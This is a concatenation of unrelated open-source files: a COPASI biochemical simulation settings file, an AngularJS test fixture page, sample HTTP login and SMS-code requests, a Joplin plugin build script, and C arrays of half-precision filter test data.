value="0"/> <Parameter name="StepNumber" type="unsignedInteger" value="100"/> <Parameter name="StepSize" type="float" value="1"/> <Parameter name="Duration" type="float" value="100"/> <Parameter name="TimeSeriesRequested" type="bool" value="0"/> <Parameter name="OutputStartTime" type="float" value="0"/> <Parameter name="Output Event" type="bool" value="0"/> <Parameter name="Start in Steady State" type="bool" value="0"/> <Parameter name="Use Values" type="bool" value="0"/> <Parameter name="Values" type="string" value=""/> </Problem> <Method name="Stochastic (Direct method)" type="Stochastic"> <Parameter name="Max Internal Steps" type="integer" value="1000000"/> <Parameter name="Use Random Seed" type="bool" value="0"/> <Parameter name="Random Seed" type="unsignedInteger" value="1"/> </Method> </Task> <Task key="Task_17" name="Scan" type="scan" scheduled="false" updateModel="false"> <Problem> <Parameter name="Subtask" type="unsignedInteger" value="1"/> <ParameterGroup name="ScanItems"> </ParameterGroup> <Parameter name="Output in subtask" type="bool" value="1"/> <Parameter name="Adjust initial conditions" type="bool" value="0"/> <Parameter name="Continue on Error" type="bool" value="0"/> </Problem> <Method name="Scan Framework" type="ScanFramework"> </Method> </Task> <Task key="Task_18" name="Elementary Flux Modes" type="fluxMode" scheduled="false" updateModel="false"> <Report reference="Report_12" target="" append="1" confirmOverwrite="1"/> <Problem> </Problem> <Method name="EFM Algorithm" type="EFMAlgorithm"> </Method> </Task> <Task key="Task_19" name="Optimization" type="optimization" scheduled="false" updateModel="false"> <Report reference="Report_13" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="Subtask" type="cn" value="CN=Root,Vector=TaskList[Steady-State]"/> <ParameterText name="ObjectiveExpression" type="expression"> </ParameterText> <Parameter name="Maximize" type="bool" value="0"/> <Parameter name="Randomize Start Values" type="bool" value="0"/> <Parameter name="Calculate Statistics" type="bool" value="1"/> <ParameterGroup name="OptimizationItemList"> </ParameterGroup> <ParameterGroup name="OptimizationConstraintList"> </ParameterGroup> </Problem> <Method name="Random Search" type="RandomSearch"> <Parameter name="Log Verbosity" type="unsignedInteger" value="0"/> <Parameter name="Number of Iterations" type="unsignedInteger" value="100000"/> <Parameter name="Random Number Generator" type="unsignedInteger" value="1"/> <Parameter name="Seed" type="unsignedInteger" value="0"/> </Method> </Task> <Task key="Task_20" name="Parameter Estimation" type="parameterFitting" scheduled="false" updateModel="false"> <Report reference="Report_14" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="Maximize" type="bool" value="0"/> <Parameter name="Randomize Start Values" type="bool" value="0"/> <Parameter name="Calculate Statistics" type="bool" value="1"/> <ParameterGroup name="OptimizationItemList"> </ParameterGroup> <ParameterGroup name="OptimizationConstraintList"> </ParameterGroup> <Parameter name="Steady-State" type="cn" value="CN=Root,Vector=TaskList[Steady-State]"/> <Parameter name="Time-Course" type="cn" value="CN=Root,Vector=TaskList[Time-Course]"/> <Parameter name="Create Parameter Sets" type="bool" value="0"/> <Parameter name="Use Time Sens" type="bool" value="0"/> <Parameter name="Time-Sens" type="cn" value=""/> <ParameterGroup name="Experiment Set"> </ParameterGroup> <ParameterGroup name="Validation Set"> <Parameter name="Weight" type="unsignedFloat" value="1"/> <Parameter name="Threshold" type="unsignedInteger" value="5"/> </ParameterGroup> </Problem> <Method name="Evolutionary Programming" type="EvolutionaryProgram"> <Parameter name="Log Verbosity" type="unsignedInteger" value="0"/> <Parameter name="Number of Generations" type="unsignedInteger" value="200"/> <Parameter name="Population Size" type="unsignedInteger" value="20"/> <Parameter name="Random Number Generator" type="unsignedInteger" value="1"/> <Parameter name="Seed" type="unsignedInteger" value="0"/> <Parameter name="Stop after # Stalled Generations" type="unsignedInteger" value="0"/> </Method> </Task> <Task key="Task_21" name="Metabolic Control Analysis" type="metabolicControlAnalysis" scheduled="false" updateModel="false"> <Report reference="Report_15" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="Steady-State" type="key" value="Task_28"/> </Problem> <Method name="MCA Method (Reder)" type="MCAMethod(Reder)"> <Parameter name="Modulation Factor" type="unsignedFloat" value="1.0000000000000001e-09"/> <Parameter name="Use Reder" type="bool" value="1"/> <Parameter name="Use Smallbone" type="bool" value="1"/> </Method> </Task> <Task key="Task_22" name="Lyapunov Exponents" type="lyapunovExponents" scheduled="false" updateModel="false"> <Report reference="Report_16" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="ExponentNumber" type="unsignedInteger" value="3"/> <Parameter name="DivergenceRequested" type="bool" value="1"/> <Parameter name="TransientTime" type="float" value="0"/> </Problem> <Method name="Wolf Method" type="WolfMethod"> <Parameter name="Orthonormalization Interval" type="unsignedFloat" value="1"/> <Parameter name="Overall time" type="unsignedFloat" value="1000"/> <Parameter name="Relative Tolerance" type="unsignedFloat" value="9.9999999999999995e-07"/> <Parameter name="Absolute Tolerance" type="unsignedFloat" value="9.9999999999999998e-13"/> <Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/> </Method> </Task> <Task key="Task_23" name="Time Scale Separation Analysis" type="timeScaleSeparationAnalysis" scheduled="false" updateModel="false"> <Report reference="Report_17" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="StepNumber" type="unsignedInteger" value="100"/> <Parameter name="StepSize" type="float" value="0.01"/> <Parameter name="Duration" type="float" value="1"/> <Parameter name="TimeSeriesRequested" type="bool" value="1"/> <Parameter name="OutputStartTime" type="float" value="0"/> </Problem> <Method name="ILDM (LSODA,Deuflhard)" type="TimeScaleSeparation(ILDM,Deuflhard)"> <Parameter name="Deuflhard Tolerance" type="unsignedFloat" value="0.0001"/> </Method> </Task> <Task key="Task_24" name="Sensitivities" type="sensitivities" scheduled="false" updateModel="false"> <Report reference="Report_18" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="SubtaskType" type="unsignedInteger" value="1"/> <ParameterGroup name="TargetFunctions"> <Parameter name="SingleObject" type="cn" value=""/> <Parameter name="ObjectListType" type="unsignedInteger" value="7"/> </ParameterGroup> <ParameterGroup name="ListOfVariables"> <ParameterGroup name="Variables"> <Parameter name="SingleObject" type="cn" value=""/> <Parameter name="ObjectListType" type="unsignedInteger" value="41"/> </ParameterGroup> <ParameterGroup name="Variables"> <Parameter name="SingleObject" type="cn" value=""/> <Parameter name="ObjectListType" type="unsignedInteger" value="0"/> </ParameterGroup> </ParameterGroup> </Problem> <Method name="Sensitivities Method" type="SensitivitiesMethod"> <Parameter name="Delta factor" type="unsignedFloat" value="0.001"/> <Parameter name="Delta minimum" type="unsignedFloat" value="9.9999999999999998e-13"/> </Method> </Task> <Task key="Task_25" name="Moieties" type="moieties" scheduled="false" updateModel="false"> <Report reference="Report_23" target="" append="1" confirmOverwrite="1"/> <Problem> </Problem> <Method name="Householder Reduction" type="Householder"> </Method> </Task> <Task key="Task_26" name="Cross Section" type="crosssection" scheduled="false" updateModel="false"> <Problem> <Parameter name="AutomaticStepSize" type="bool" value="0"/> <Parameter name="StepNumber" type="unsignedInteger" value="100"/> <Parameter name="StepSize" type="float" value="0.01"/> <Parameter name="Duration" type="float" value="1"/> <Parameter name="TimeSeriesRequested" type="bool" value="1"/> <Parameter name="OutputStartTime" type="float" value="0"/> <Parameter name="Output Event" type="bool" value="0"/> <Parameter name="Start in Steady State" type="bool" value="0"/> <Parameter name="Use Values" type="bool" value="0"/> <Parameter name="Values" type="string" value=""/> <Parameter name="LimitCrossings" type="bool" value="0"/> <Parameter name="NumCrossingsLimit" type="unsignedInteger" value="0"/> <Parameter name="LimitOutTime" type="bool" value="0"/> <Parameter name="LimitOutCrossings" type="bool" value="0"/> <Parameter name="PositiveDirection" type="bool" value="1"/> <Parameter name="NumOutCrossingsLimit" type="unsignedInteger" value="0"/> <Parameter name="LimitUntilConvergence" type="bool" value="0"/> <Parameter name="ConvergenceTolerance" type="float" value="9.9999999999999995e-07"/> <Parameter name="Threshold" type="float" value="0"/> <Parameter name="DelayOutputUntilConvergence" type="bool" value="0"/> <Parameter name="OutputConvergenceTolerance" type="float" value="9.9999999999999995e-07"/> <ParameterText name="TriggerExpression" type="expression"> </ParameterText> <Parameter name="SingleVariable" type="cn" value=""/> </Problem> <Method name="Deterministic (LSODA)" type="Deterministic(LSODA)"> <Parameter name="Integrate Reduced Model" type="bool" value="0"/> <Parameter name="Relative Tolerance" type="unsignedFloat" value="9.9999999999999995e-07"/> <Parameter name="Absolute Tolerance" type="unsignedFloat" value="9.9999999999999998e-13"/> <Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/> <Parameter name="Max Internal Step Size" type="unsignedFloat" value="0"/> </Method> </Task> <Task key="Task_27" name="Linear Noise Approximation" type="linearNoiseApproximation" scheduled="false" updateModel="false"> <Report reference="Report_19" target="" append="1" confirmOverwrite="1"/> <Problem> <Parameter name="Steady-State" type="key" value="Task_28"/> </Problem> <Method name="Linear Noise Approximation" type="LinearNoiseApproximation"> </Method> </Task> <Task key="Task_29" name="Time-Course Sensitivities" type="timeSensitivities" scheduled="false" updateModel="false"> <Problem> <Parameter name="AutomaticStepSize" type="bool" value="0"/> <Parameter name="StepNumber" type="unsignedInteger" value="100"/> <Parameter name="StepSize" type="float" value="0.01"/> <Parameter name="Duration" type="float" value="1"/> <Parameter name="TimeSeriesRequested" type="bool" value="1"/> <Parameter name="OutputStartTime" type="float" value="0"/> <Parameter name="Output Event" type="bool" value="0"/> <Parameter name="Start in Steady State" type="bool" value="0"/> <Parameter name="Use Values" type="bool" value="0"/> <Parameter name="Values" type="string" value=""/> <ParameterGroup name="ListOfParameters"> </ParameterGroup> <ParameterGroup name="ListOfTargets"> </ParameterGroup> </Problem> <Method name="LSODA Sensitivities" type="Sensitivities(LSODA)"> <Parameter name="Integrate Reduced Model" type="bool" value="0"/> <Parameter name="Relative Tolerance" type="unsignedFloat" value="9.9999999999999995e-07"/> <Parameter name="Absolute Tolerance" type="unsignedFloat" value="9.9999999999999998e-13"/> <Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/> <Parameter name="Max Internal Step Size" type="unsignedFloat" value="0"/> </Method> </Task> </ListOfTasks> <ListOfReports> <Report key="Report_11" name="Steady-State" taskType="steadyState" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Footer> <Object cn="CN=Root,Vector=TaskList[Steady-State]"/> </Footer> </Report> <Report key="Report_12" name="Elementary Flux Modes" taskType="fluxMode" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Footer> <Object cn="CN=Root,Vector=TaskList[Elementary Flux Modes],Object=Result"/> </Footer> </Report> <Report key="Report_13" name="Optimization" taskType="optimization" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Optimization],Object=Description"/> <Object cn="String=\[Function Evaluations\]"/> <Object cn="Separator=&#x09;"/> <Object cn="String=\[Best Value\]"/> <Object cn="Separator=&#x09;"/> <Object cn="String=\[Best Parameters\]"/> </Header> <Body> <Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Function Evaluations"/> <Object cn="Separator=&#x09;"/> <Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Best Value"/> <Object cn="Separator=&#x09;"/> <Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Best Parameters"/> </Body> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Optimization],Object=Result"/> </Footer> </Report> <Report key="Report_14" name="Parameter Estimation" taskType="parameterFitting" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Object=Description"/> <Object cn="String=\[Function Evaluations\]"/> <Object cn="Separator=&#x09;"/> <Object cn="String=\[Best Value\]"/> <Object cn="Separator=&#x09;"/> <Object cn="String=\[Best Parameters\]"/> </Header> <Body> <Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Function Evaluations"/> <Object cn="Separator=&#x09;"/> <Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Best Value"/> <Object cn="Separator=&#x09;"/> <Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Best Parameters"/> </Body> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Object=Result"/> </Footer> </Report> <Report key="Report_15" name="Metabolic Control Analysis" taskType="metabolicControlAnalysis" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Metabolic Control Analysis],Object=Description"/> </Header> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Metabolic Control Analysis],Object=Result"/> </Footer> </Report> <Report key="Report_16" name="Lyapunov Exponents" taskType="lyapunovExponents" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Lyapunov Exponents],Object=Description"/> </Header> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Lyapunov Exponents],Object=Result"/> </Footer> </Report> <Report key="Report_17" name="Time Scale Separation Analysis" taskType="timeScaleSeparationAnalysis" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Time Scale Separation Analysis],Object=Description"/> </Header> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Time Scale Separation Analysis],Object=Result"/> </Footer> </Report> <Report key="Report_18" name="Sensitivities" taskType="sensitivities" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Sensitivities],Object=Description"/> </Header> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Sensitivities],Object=Result"/> </Footer> </Report> <Report key="Report_19" name="Linear Noise Approximation" taskType="linearNoiseApproximation" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Linear Noise Approximation],Object=Description"/> </Header> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Linear Noise Approximation],Object=Result"/> </Footer> </Report> <Report key="Report_20" name="report" taskType="timeCourse" separator="&#x09;" precision="6"> <Comment> </Comment> <Table printTitle="1"> <Object cn="CN=Root,Model=multistate,Reference=Time"/> <Object cn="CN=Root,Model=multistate,Vector=Values[Group_A_P],Reference=Value"/> <Object cn="CN=Root,Model=multistate,Vector=Values[Group_A_bound_P],Reference=Value"/> <Object cn="CN=Root,Model=multistate,Vector=Values[Group_A_unbound_P],Reference=Value"/> <Object cn="CN=Root,Model=multistate,Vector=Values[Group_RLA_P],Reference=Value"/> </Table> </Report> <Report key="Report_21" name="Time-Course" taskType="timeCourse" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Time-Course],Object=Description"/> </Header> <Footer> <Object cn="CN=Root,Vector=TaskList[Time-Course],Object=Result"/> </Footer> </Report> <Report key="Report_23" name="Moieties" taskType="moieties" separator="&#x09;" precision="6"> <Comment> Automatically generated report. </Comment> <Header> <Object cn="CN=Root,Vector=TaskList[Moieties],Object=Description"/> </Header> <Footer> <Object cn="String=&#x0a;"/> <Object cn="CN=Root,Vector=TaskList[Moieties],Object=Result"/> </Footer> </Report> <Report key="Report_24" name="Speed test" taskType="timeCourse" separator="&#x09;" precision="8"> <Comment> </Comment> <Header> <Object cn="CN=Root,CN=Information,String=COPASI Version"/> <Object cn="Separator=&#x09;"/> <Object cn="CN=Root,CN=Information,Timer=Current Date/Time"/> </Header> <Footer> <Object cn="CN=Root,Timer=CPU Time"/> </Footer> </Report> </ListOfReports> <GUI> </GUI> <SBMLReference file="fixed_multistate.xml"> <SBMLMap SBMLid="A0" COPASIkey="ModelValue_2"/> <SBMLMap SBMLid="Group_A_P" COPASIkey="ModelValue_12"/> <SBMLMap SBMLid="Group_A_bound_P" COPASIkey="ModelValue_14"/> <SBMLMap SBMLid="Group_A_unbound_P" COPASIkey="ModelValue_13"/> <SBMLMap SBMLid="Group_RLA_P" COPASIkey="ModelValue_15"/> <SBMLMap SBMLid="L0" COPASIkey="ModelValue_3"/> <SBMLMap SBMLid="R0" COPASIkey="ModelValue_4"/> <SBMLMap SBMLid="R1" COPASIkey="Reaction_3178"/> <SBMLMap SBMLid="R10" COPASIkey="Reaction_481"/> <SBMLMap SBMLid="R11" COPASIkey="Reaction_482"/> <SBMLMap SBMLid="R12" COPASIkey="Reaction_483"/> <SBMLMap SBMLid="R13" COPASIkey="Reaction_484"/> <SBMLMap SBMLid="R14" COPASIkey="Reaction_485"/> <SBMLMap SBMLid="R15" COPASIkey="Reaction_486"/> <SBMLMap SBMLid="R16" COPASIkey="Reaction_487"/> <SBMLMap SBMLid="R17" COPASIkey="Reaction_488"/> <SBMLMap SBMLid="R18" COPASIkey="Reaction_489"/> <SBMLMap SBMLid="R2" COPASIkey="Reaction_3179"/> <SBMLMap SBMLid="R3" COPASIkey="Reaction_3180"/> <SBMLMap SBMLid="R4" COPASIkey="Reaction_3181"/> <SBMLMap SBMLid="R5" COPASIkey="Reaction_476"/> <SBMLMap SBMLid="R6" COPASIkey="Reaction_477"/> <SBMLMap SBMLid="R7" COPASIkey="Reaction_478"/> <SBMLMap SBMLid="R8" COPASIkey="Reaction_479"/> <SBMLMap SBMLid="R9" COPASIkey="Reaction_480"/> <SBMLMap SBMLid="S1" COPASIkey="Metabolite_1577"/> <SBMLMap SBMLid="S2" COPASIkey="Metabolite_1578"/> <SBMLMap SBMLid="S3" COPASIkey="Metabolite_1586"/> <SBMLMap SBMLid="S4" COPASIkey="Metabolite_398"/> <SBMLMap SBMLid="S5" COPASIkey="Metabolite_397"/> <SBMLMap SBMLid="S6" COPASIkey="Metabolite_396"/> <SBMLMap SBMLid="S7" COPASIkey="Metabolite_395"/> <SBMLMap SBMLid="S8" COPASIkey="Metabolite_394"/> <SBMLMap SBMLid="S9" COPASIkey="Metabolite_393"/> <SBMLMap SBMLid="cell" COPASIkey="Compartment_67"/> <SBMLMap SBMLid="kAdp" COPASIkey="ModelValue_11"/> <SBMLMap SBMLid="kAoff" COPASIkey="ModelValue_9"/> <SBMLMap SBMLid="kAon" COPASIkey="ModelValue_8"/> <SBMLMap SBMLid="kAp" COPASIkey="ModelValue_10"/> <SBMLMap SBMLid="koff" COPASIkey="ModelValue_0"/> <SBMLMap SBMLid="kon" COPASIkey="ModelValue_1"/> </SBMLReference> <ListOfUnitDefinitions> <UnitDefinition key="Unit_1" name="meter" symbol="m"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Unit_0"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T16:25:24Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> m </Expression> </UnitDefinition> <UnitDefinition key="Unit_5" name="second" symbol="s"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Unit_4"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T16:25:24Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> s </Expression> </UnitDefinition> <UnitDefinition key="Unit_17" name="item" symbol="#"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Unit_16"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T16:25:24Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> # </Expression> </UnitDefinition> <UnitDefinition key="Unit_35" name="liter" symbol="l"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Unit_34"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T16:25:24Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> 0.001*m^3 </Expression> </UnitDefinition> </ListOfUnitDefinitions> </COPASI>
Component Pascal
4
MedAnisse/COPASI
speed-test-suite/multistate_gillespie.cps
[ "Artistic-2.0" ]
<!DOCTYPE html> <html ng-app="test" ng-jq> <body> <span class="before-ready">{{beforeReady}}</span> <span class="after-ready">{{afterReady}}</span> <span class="after-ready-sync">{{afterReadySync}}</span> <span class="after-ready-method">{{afterReadyMethod}}</span> <span class="after-ready-method-sync">{{afterReadyMethodSync}}</span> <script src="angular.js"></script> <script src="script.js"></script> <div id="div-after-scripts">This div is loaded after scripts.</div> </body> </html>
HTML
3
skylarkfw/skylark-angular2
original/angular.js-1.7.5/test/e2e/fixtures/ready/index.html
[ "MIT" ]
### 请求 /login 接口 => 成功 POST {{userServerUrl}}/login Content-Type: application/json { "mobile": "15601691300", "password": "admin123" } ### 请求 /send-sms-code 接口 => 成功 POST {{userServerUrl}}/send-sms-code Content-Type: application/json { "mobile": "15601691399", "scene": 1 } ### 请求 /sms-login 接口 => 成功 POST {{userServerUrl}}/sms-login Content-Type: application/json { "mobile": "15601691301", "code": 9999 } ### 请求 /logout 接口 => 成功 POST {{userServerUrl}}/logout Content-Type: application/json Authorization: Bearer c1b76bdaf2c146c581caa4d7fd81ee66
HTTP
3
cksspk/ruoyi-vue-pro
yudao-user-server/src/main/java/cn/iocoder/yudao/userserver/modules/system/controller/auth/SysAuthController.http
[ "MIT" ]
#!/bin/bash # - Update src/manifest.json with the new version number # - Run the below command # - Then the file /manifests.json also needs to be updated with the new manifest file yarn run dist && cp publish/org.joplinapp.plugins.RegisterCommandDemo.jpl ~/src/joplin-plugins-test/plugins/org.joplinapp.plugins.RegisterCommandDemo/plugin.jpl && cp publish/org.joplinapp.plugins.RegisterCommandDemo.json ~/src/joplin-plugins-test/plugins/org.joplinapp.plugins.RegisterCommandDemo/plugin.json
Shell
3
asahiocean/joplin
packages/app-cli/tests/support/plugins/register_command/test_plugin_update.sh
[ "MIT" ]
static const uint16_t in_default_val[100] = { 0xb09e, 0x3816, 0x3626, 0x34c1, 0x3773, 0x39c3, 0x39a2, 0x39e7, 0x31a7, 0xacbc, 0xa80f, 0xa1d4, 0xb003, 0xb9b3, 0xb6f4, 0xba09, 0xb1b3, 0xb424, 0xb42c, 0xb70b, 0x2d56, 0x381e, 0x388f, 0x32c7, 0x33d9, 0x3984, 0x3a38, 0x3708, 0xa596, 0x2cc8, 0xa5ea, 0x2989, 0xb52a, 0xb972, 0xb7a0, 0xb6c1, 0xb2cf, 0xb84f, 0xb71c, 0xb485, 0x352c, 0x376e, 0x381f, 0x3496, 0x2de2, 0x3a32, 0x3a68, 0x3820, 0xacc8, 0xab2c, 0x3094, 0xaf66, 0xb411, 0xb969, 0xba0c, 0xb5e3, 0xb41a, 0xb940, 0xb792, 0xb0af, 0x3632, 0x37ba, 0x35e0, 0x3619, 0x3873, 0x38ee, 0x384f, 0x3712, 0xa660, 0x2a80, 0xab3a, 0xb061, 0xb7fb, 0xbc00, 0xba5e, 0xb3b5, 0xb483, 0xb748, 0xb74c, 0x232e, 0x33e5, 0x37bb, 0x36cc, 0x37ce, 0x37a3, 0x39cb, 0x3841, 0x358e, 0x298b, 0x299d, 0x2c3a, 0xb173, 0xb78d, 0xb9e0, 0xb995, 0xb0ab, 0xb33b, 0xb88e, 0xb85c, 0x2408 }; static const uint16_t in_default_coeff[15] = { 0x251f, 0xa588, 0x251f, 0x3efa, 0xba7b, 0x3c00, 0xbe5e, 0x3c00, 0x3efd, 0xbb87, 0x3c00, 0xc000, 0x3c00, 0x3fd5, 0xbbaf }; static const uint16_t ref_default[100] = { 0x99e9, 0x2015, 0x217a, 0x25a4, 0x298b, 0x2cae, 0x2eed, 0x30ed, 0x323c, 0x3396, 0x3454, 0x3491, 0x346d, 0x3378, 0x3186, 0x2c88, 0xa8ee, 0xb169, 0xb4b2, 0xb67d, 0xb7ac, 0xb81e, 0xb808, 0xb72a, 0xb57b, 0xb267, 0xa97b, 0x2f51, 0x3416, 0x35f3, 0x3706, 0x375b, 0x36ca, 0x357c, 0x335d, 0x2db8, 0xab22, 0xb26e, 0xb51a, 0xb686, 0xb738, 0xb750, 0xb6ae, 0xb57f, 0xb3bb, 0xaf0a, 0x251d, 0x30b5, 0x3419, 0x358d, 0x367b, 0x36b6, 0x3664, 0x3565, 0x33d9, 0x303e, 0x16fa, 0xb067, 0xb424, 0xb5c0, 0xb6c9, 0xb739, 0xb6ef, 0xb5e4, 0xb433, 0xb01d, 0x258f, 0x319b, 0x34f0, 0x36b8, 0x37c4, 0x3807, 0x3777, 0x3609, 0x340e, 0x2eaf, 0xac05, 0xb319, 0xb5b2, 0xb72b, 0xb7f4, 0xb7db, 0xb6f6, 0xb549, 0xb22a, 0xa7c9, 0x302b, 0x347e, 0x366e, 0x37cc, 0x3836, 0x381d, 0x374a, 0x35b2, 0x3348, 0x2da3, 0xabfb, 0xb280, 0xb516, 0xb656 }; static const uint16_t in_rand_coeff[690] = { 0x251f, 0x1c55, 0x251f, 0x1bd9, 0x86fc, 0x3c00, 0xb114, 0x3c00, 0x24c4, 0x939e, 0x3c00, 0x3c9e, 0x3c00, 0xafbc, 0xa429, 0x3c00, 0x3e23, 0x3c00, 0xb664, 0xab3b, 0x3c00, 0x3fff, 0x3c00, 0xb7c3, 0xac1d, 0x3c00, 0xb779, 0x3c00, 0x39bf, 0xb025, 0x3c00, 0xb788, 0x3c00, 0x3669, 0xb028, 0x251f, 0xa919, 0x251f, 0x1a24, 0x839b, 0x3c00, 0x4000, 0x3c00, 0xa4a4, 0x88ba, 0x3c00, 0xbfa6, 0x3c00, 0x346e, 0xa6fb, 0x3c00, 0x31f1, 0x3c00, 0x3381, 0xabf7, 0x3c00, 0x374c, 0x3c00, 0xb448, 0xb107, 0x3c00, 0xba66, 0x3c00, 0x3633, 0xb533, 0x3c00, 0x3f81, 0x3c00, 0xbcaa, 0xb60c, 0x251f, 0xa839, 0x251f, 0x2faa, 0xa4f3, 0x3c00, 0x3cd4, 0x3c00, 0xa51b, 0xa61e, 0x3c00, 0xbf61, 0x3c00, 0x3876, 0xacfa, 0x3c00, 0x3c0b, 0x3c00, 0xa8e6, 0xad20, 0x3c00, 0x3872, 0x3c00, 0xa6c4, 0xb040, 0x3c00, 0xbf80, 0x3c00, 0x3acb, 0xb1f5, 0x3c00, 0x3fbd, 0x3c00, 0xbd58, 0xb725, 0x251f, 0x2813, 0x251f, 0xa9ea, 0x913d, 0x3c00, 0xbff6, 0x3c00, 0x2927, 0x940e, 0x3c00, 0xbfe6, 0x3c00, 0x2b18, 0x9dc1, 0x3c00, 0x3b88, 0x3c00, 0x2844, 0x9dcb, 0x3c00, 0xbfd9, 0x3c00, 0x326a, 0xa700, 0x3c00, 0x3f9a, 0x3c00, 0xb5c4, 0xa829, 0x3c00, 0x3f1e, 0x3c00, 0xb55c, 0xa8e4, 0x3c00, 0xb320, 0x3c00, 0x349a, 0xaccc, 0x3c00, 0xbfb5, 0x3c00, 0x390c, 0xaf2c, 0x3c00, 0xb47c, 0x3c00, 0x3677, 0xafa9, 0x3c00, 0x39c3, 0x3c00, 0xb280, 0xafcd, 0x3c00, 0xbd46, 0x3c00, 0x36de, 0xb3f4, 0x3c00, 0x3848, 0x3c00, 0xb4b7, 0xb55b, 0x3c00, 0xbe63, 0x3c00, 0x3b4e, 0xb5bb, 0x3c00, 0xbf9b, 0x3c00, 0x3cc1, 0xb661, 0x3c00, 0xbfc2, 0x3c00, 0x3cfd, 0xb68e, 0x251f, 0xa8fe, 0x251f, 0x234e, 0x9353, 0x3c00, 0xbfa4, 0x3c00, 0xa820, 0x95c5, 0x3c00, 0xbda1, 0x3c00, 0xabf2, 0xa4fd, 0x3c00, 0xbd1e, 0x3c00, 0x29bc, 0xa653, 0x3c00, 0x322e, 0x3c00, 0xb0b5, 0xa712, 0x3c00, 0xbc1a, 0x3c00, 0x343e, 0xabe5, 0x3c00, 0x37f4, 0x3c00, 0xb628, 0xaed3, 0x3c00, 0x3ae2, 0x3c00, 0xb4f3, 0xb15a, 0x3c00, 0x3e11, 0x3c00, 0xbb28, 0xb271, 0x3c00, 0xae69, 0x3c00, 0x2e06, 0xb2ca, 0x3c00, 0xbdb7, 0x3c00, 0x3ab3, 0xb407, 0x3c00, 0x3ffa, 0x3c00, 0xbc1b, 0xb4dc, 0x3c00, 0x3eb1, 0x3c00, 0xbc18, 0xb582, 0x3c00, 0x3fe5, 0x3c00, 0xbca0, 0xb583, 0x3c00, 0x3d1b, 0x3c00, 0xba01, 0xb5a5, 0x3c00, 0xbe61, 0x3c00, 0x3c46, 0xb6a9, 0x251f, 0xa571, 0x251f, 0x2dd5, 0x9fc6, 0x3c00, 0xbf22, 0x3c00, 0x3383, 0xa316, 0x3c00, 0x31f7, 0x3c00, 0x1d99, 0xa445, 0x3c00, 0x3df3, 0x3c00, 0xb498, 0xa569, 0x3c00, 0x3e04, 0x3c00, 0xb467, 0xa713, 0x3c00, 0x3e69, 0x3c00, 0xb7c5, 0xac2c, 0x3c00, 0xbe65, 0x3c00, 0x365d, 0xac70, 0x3c00, 0xba5d, 0x3c00, 0x32ca, 0xac76, 0x3c00, 0x38c0, 0x3c00, 0xb1b5, 